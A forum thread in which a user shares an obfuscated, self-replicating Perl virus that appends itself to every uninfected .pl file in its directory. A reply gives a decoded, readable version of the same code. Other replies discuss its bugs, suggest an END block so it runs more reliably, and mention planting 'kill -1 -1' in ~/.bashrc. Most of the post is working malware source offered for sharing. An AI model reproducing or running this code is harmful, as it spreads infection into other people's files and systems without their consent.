A very simple perl virus that I wanted to share. Copies itself to the end of every perl file in its directory that is not already infected; does nothing else. The code is obfuscated to make it harder to recognize (althought, it's not very hard for anyone who knows perl well). 
#auiqi
@a=#;
qw{do file reach open print self close while ; auiqi};$a=#;
$a.'s/'.$_.'/'.$a[$_].'/g;'for($a+1..9);$_=#;
q{@a = <*>8 1s:fo2(@a){if(m^.pl^){$a=$_83(1,$a)8 7(<1>){next 1s if m`9
+`8} 6 18 3(1,'>>'.$a )8 3(5,$0)8  7(<5>){last if /9/;} 4 1 "#9\n"; 4 
+1 7<5>8  }}};
eval $a;eval;

[download]
EDIT: Fixed the bugs that kyle pointed out.

Replies are listed 'Best First'.
Re: Simple perl virus
by kyle (Abbot) on Apr 09, 2008 at 15:20 UTC

    Here's a "decoded" version: 

    $_ = q{
    @oghi = <*>;

    files:
    foreach(@oghi){
        if ( m^.pl^ ){
            $a = $_;

            open(file,$a);
            while (<file>){
                next files if m`oghi`;
            }
            close file;

            open(file,'>>'.$a );
            open(self,$0);

            print file while <self>;

            close file;
            close self;
        }
    }
};
eval;

    [download]

    I haven't run this, but it looks to me as if it has a bug. If you run it by itself, it will "infect" every .pl it finds. Say it infects a.pl. If I then run a.pl, and it gets to this code (i.e., a.pl does not die or exit or exec or something), it will try again to infect everything, but at that point, all of a.pl will be attached to the new infections (instead of just the virus code).

    Note to future "virus" authors: You don't normally need to call close. Perl will do it for you. Doing this in a virus is like an armed robber saying "please" and "thank you". On the other hand, I found it funny.

[reply]
[d/l]
      It doesn't work at all in Perl files with a __DATA__/__END__ section.

      And, you could wrap it in a END section. That way it has more chance of actually being run.

[reply]
      Thought experiment: try thinking of a cracker as a Gentleman thief

      <experiment>

      "With greatest regrets, it would appear that all your boxes are belong my family for the last three hundred years. Would you care for a cup of Assam?"

      </experiment>

      Results: inconclusive.

[reply]
Re: Simple perl virus
by zentara (Cardinal) on Apr 09, 2008 at 15:04 UTC
    The node title may be disconcerting, but I don't think it should be deleted. At the very least it's a good reminder not to run obfuscated code, without investigating it first. Its good to be reminded of that occaisionally.... even on linux, a rogue script can do alot of damage to your home directory. What if it modified your ~./bashrc and added kill -1 -1 to it? Alot of people would be stumped and be stuck with a broken system. I shudder to think of what damage could be done to a Microsoft Windows system.
    I'm not really a human, but I play one on earth. Cogito ergo sum a bum
[reply]
A reply falls below the community's threshold of quality. You may see it by logging in.

Back to Cool Uses for Perl